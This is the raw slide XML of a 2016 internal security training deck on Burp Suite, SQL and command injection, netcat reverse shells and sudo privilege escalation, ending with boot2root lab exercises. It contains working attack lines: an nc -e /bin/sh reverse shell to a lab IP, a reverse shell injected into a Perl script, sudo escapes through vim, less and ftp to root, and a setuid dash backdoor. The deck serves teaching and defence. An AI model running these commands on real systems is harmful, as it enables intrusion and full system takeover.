          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>-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&lt;port&gt;	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>(listen for connections on a TCP port)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&lt;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dirty="0" smtClean="0"/>
              <a:t>	(execute a command and bind its STDIN/STDERR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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AU" dirty="0" smtClean="0"/>
              <a:t>		(don't try to resolve domain names)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Some example usages:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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lvp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4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	# listen verbosely on TCP/4444 - don't forget to make a firewall hole!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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-e /bin/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192.168.1.101 4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	# connect to 192.168.1.101:4444 and give it an instance of /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>Windows, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://nmap.org/ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" smtClean="0"/>
              <a:t> for catching shells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4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am a security guy first, and programmer fifth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>I've done my best to write code that demonstrates good security principles, not necessarily good (or even okay) development principles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Let me know afterwards what you hated about my code :)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>I kept the demos command-line so we can rapidly play with them at a terminal with minimal moving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>pieces.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same principles apply to code that is plumbed up to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-A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a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> reverse shell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76136" y="1690688"/>
            <a:ext cx="9777663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lvp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4444		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listen for a connection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 on [any] 4444 ...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[127.0.0.1] from localhost [127.0.0.1] 59558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6136" y="2757488"/>
            <a:ext cx="977766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./ls_backticks_unsafe.pl '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-e /bin/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127.0.0.1 4444'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exploited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about to do the ls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ls: cannot access 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such file or directory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7" y="1613347"/>
            <a:ext cx="893345" cy="893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6136" y="3782375"/>
            <a:ext cx="9777663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[127.0.0.1] from localhost [127.0.0.1] 59558</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU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uptime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19:00:57 up 2 days,  8:03,  2 users,  load average: 1.00, 1.19, 1.27</a:t>
            </a:r>
          </a:p>
          <a:p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AU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-la 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AU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2235 Dec  9 13:46 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AU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7" y="3782375"/>
            <a:ext cx="893345" cy="89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9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a reverse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Is your firewall blocking the connection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Are you behind NAT? Do you need to forward a port?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Can the remote host connect to you at all? Try injecting a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&lt;host&gt;:&lt;port&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>on the remote box and see if your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dirty="0" smtClean="0"/>
              <a:t> catches the HTTP request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>If it does, your 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dirty="0" smtClean="0"/>
              <a:t> on the remote host is wonky</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>If it does not, there's a connectivity problem or a problem with your command injection. Back to the drawing board for you.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Is the remote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AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>erroring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> out? Redirect its STDERR to STDOUT (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r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>) and see if you get a copy of the error message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Hard-mode: The remote machine might have outbound firewall rules (aka egress filtering). Try some different ports (e.g. 80, 443, 53 (DNS), 123 (NTP))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Super hard-mode: If all outbound TCP is blocked, try ICMP or DNS tunnelling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73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Protip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> - non-interactive vs. interactive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Remote shells are normally "non-interactive" shells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Second-rate citizen. Struggles with running things like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/>
              <a:t>,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AU" dirty="0" smtClean="0"/>
              <a:t>,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A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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Solution: One weird python trick (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sysadmins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> hate him!)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168" y="3506788"/>
            <a:ext cx="977766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-c 'import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pty.spawn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("/bin/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")'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launch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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interactively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-c 'import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AU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pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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("/bin/bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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")'	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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launch bash interactively</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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49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shell topics for another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netcat.traditional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>netcat.openbsd</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>netcat.openbsd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> has a different syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>It can smell like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> but fail to STDERR when you try to use it. Frustration++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>More advanced shells, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> Meterpreter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15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Burp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Reverse shells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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abuse of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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"Silence" boot2root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2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/>
              <a:t> on a single-user desktop system is generally used to elevate its single user to Super User for one-off administrative tasks</a:t>
            </a:r>
          </a:p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/>
              <a:t> can be configured (via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AU" dirty="0" smtClean="0"/>
              <a:t>) to allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>particular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> users (or groups) to run particular things as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>particular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> other users (not just the Super User) with particular arguments and/or particular constraints (such as requiring the user's password or not)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>See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smtClean="0"/>
              <a:t>for details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>To see what your account has been granted privilege to do via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AU" dirty="0" smtClean="0"/>
              <a:t>, run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r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ill-considered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AU" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> configuration can be creatively abused to achieve privilege escalation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00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6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Reading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 |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</a:t>
            </a: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:&lt;REDACTED ;)&gt;:16499:0:99999:7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493031"/>
            <a:ext cx="10515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 /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                                                                                                                             </a:t>
            </a:r>
          </a:p>
          <a:p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root:&lt;REDACTED ;)&gt;:16499:0:99999:7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::::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6995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Shelling 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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US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VIM - Vi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                                  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version 7.4.576                        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                 by Bram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Moolenaar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al. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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0,0-1         All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</a:t>
            </a:r>
          </a:p>
          <a:p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=0(root)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=0(root) groups=0(root)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752943"/>
            <a:ext cx="105156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less /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200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/hostname</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="12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diablo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/hostname (END</a:t>
            </a:r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!dash</a:t>
            </a:r>
          </a:p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</a:t>
            </a:r>
          </a:p>
          <a:p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=0(root)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=0(root) groups=0(root)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261202"/>
            <a:ext cx="105156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nl-N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ftp&gt; !dash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-N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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-N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uid=0(root) gid=0(root) groups=0(root)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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 easy on the note-taking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Slides and code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>are available at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://stash.cudaops.com/projects/BNSEC/repos/traiing/browse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66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chmod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u+s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bin/dash</a:t>
            </a:r>
          </a:p>
          <a:p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bin/dash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="1400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u-s /bin/dash</a:t>
            </a:r>
          </a:p>
          <a:p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4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02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Burp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Reverse shells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"Silence" boot2root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43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Boot2root's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Boot2root's are intentionally vulnerable machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Generally available as Virtual Appliances</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Treat them as if they're remote hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Don't log in at the console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Don't crack the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>vmdk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> open and poke around</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Attack them exclusively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645282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"Silence" is an injection-oriented boot2root developed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>BNSEC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>://corp.ws.kevinchang.me/silence_1.0.tar.gz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5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 should do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AU" dirty="0" smtClean="0"/>
              <a:t> it. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>hich ports are open? (Hint: 80)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Break in (Hint: use Burp Suite, consider the things we covered today)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Move laterally (Hint: think of the users as real people with real habits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Become root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Let us know how you did it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97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Bonus - "crash"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"Crash" is a reverse-engineering focused boot2root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>http://corp.ws.kevinchang.me/crash_1.0.ova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0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3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Thanks! Stay in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BNSEC Team &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>bnsec_team@barracuda.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Justin Kelly &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>jkelly@barracuda.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a: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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Reverse shells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Abuse of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endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>"Silence" boot2root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Burp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self-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>MitM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> tool for inspecting and manipulating HTTP and HTTPS traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Uses a personal CA Certificate for cracking open your own HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Useful for security auditing, as well as general debugging/troubleshooting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Burp Suite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Creates a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>Site Map </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>of web assets as you browse (or as it spiders)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Captures your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>history </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>(GET requests, POST requests and HTTP responses)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>Intercept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> HTTP requests/responses for in-flight modification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>Repeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> HTTP requests for replaying tampered requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>encode/encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> various formats of  data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>$$$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>Scanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> tool - premium version only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>$$$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>Intruder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> tool (like Repeater on steroids) - premium version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Download free edition </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>from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portswigger.net/burp/download.html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Install a JRE if you don't already have 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If you've installed Oracle's JRE on Windows, disable its browser plugin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Run the .jar file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Optional: Install the Firefox plugin "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>FoxyProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>" for quick proxy switching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Proxy your browser's HTTP and HTTPS through 127.0.0.1:8080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Not a SOCKS proxy! Plain old HTTP proxy.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Browse to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://burp/cert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> through the proxy and save the CA certificate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Install the CA certificate it returns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Firefox: In to your browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>keystore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Most other browsers: In to your OS's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>keystore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portswigger.net/burp/help/proxy_using.html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Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>616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 Light</vt:lpstr>
      <vt:lpstr>Source Code Pro</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>The Sounds of Silence</vt:lpstr>
      <vt:lpstr>Why are we here today</vt:lpstr>
      <vt:lpstr>We are BNSEC</vt:lpstr>
      <vt:lpstr>Disclaimer</vt:lpstr>
      <vt:lpstr>Go easy on the note-taking</vt:lpstr>
      <vt:lpstr>The beer menu</vt:lpstr>
      <vt:lpstr>Burp Suite</vt:lpstr>
      <vt:lpstr>Burp Suite Features</vt:lpstr>
      <vt:lpstr>Setup</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Burp Suite Security</vt:lpstr>
      <vt:lpstr>The beer menu</vt:lpstr>
      <vt:lpstr>A quick foreword</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Setting the stage</vt:lpstr>
      <vt:lpstr>Anti-pattern: Not parameterising queries</vt:lpstr>
      <vt:lpstr>Anti-pattern: Not parameterising queries</vt:lpstr>
      <vt:lpstr>Anti-pattern: Not parameterising queries</vt:lpstr>
      <vt:lpstr>Solution: Parameterising queries</vt:lpstr>
      <vt:lpstr>Solution: Parameterising queries</vt:lpstr>
      <vt:lpstr>Exploitation pro-tip</vt:lpstr>
      <vt:lpstr>The beer menu</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Non-command injection metacharacters</vt:lpstr>
      <vt:lpstr>Anti-pattern: Using tainted data in the first arg to system()</vt:lpstr>
      <vt:lpstr>Solution: Parameterise args to system()</vt:lpstr>
      <vt:lpstr>Anti-pattern: Using tainted data in backticks</vt:lpstr>
      <vt:lpstr>Solution: Don't use backticks. Use open()</vt:lpstr>
      <vt:lpstr>Anti-pattern: Using tainted data in 2-arg open()</vt:lpstr>
      <vt:lpstr>Solution: 3-arg open()</vt:lpstr>
      <vt:lpstr>Bonus: Argument injection</vt:lpstr>
      <vt:lpstr>Bonus: Argument injection</vt:lpstr>
      <vt:lpstr>Bonus: Argument injection</vt:lpstr>
      <vt:lpstr>Finding command injection vuls</vt:lpstr>
      <vt:lpstr>Triggering and detecting command injection</vt:lpstr>
      <vt:lpstr>The beer menu</vt:lpstr>
      <vt:lpstr>Command injection isn't cool, you know what's cool?</vt:lpstr>
      <vt:lpstr>nc - TCP/IP swiss army knife</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Example of a nc reverse shell</vt:lpstr>
      <vt:lpstr>Debugging a reverse shell</vt:lpstr>
      <vt:lpstr>Protip - non-interactive vs. interactive shells</vt:lpstr>
      <vt:lpstr>Reverse shell topics for another day</vt:lpstr>
      <vt:lpstr>The beer menu</vt:lpstr>
      <vt:lpstr>sudo</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Reading files</vt:lpstr>
      <vt:lpstr>Shelling out</vt:lpstr>
      <vt:lpstr>chmod</vt:lpstr>
      <vt:lpstr>The beer menu</vt:lpstr>
      <vt:lpstr>Boot2root's</vt:lpstr>
      <vt:lpstr>Silence</vt:lpstr>
      <vt:lpstr>What you should do to it</vt:lpstr>
      <vt:lpstr>Bonus - "crash"</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>Thanks! Stay in touch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2016-01-11T01:06:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-06-10T22:35:19Z</dcterms:modified>
</cp:coreProperties>
</file>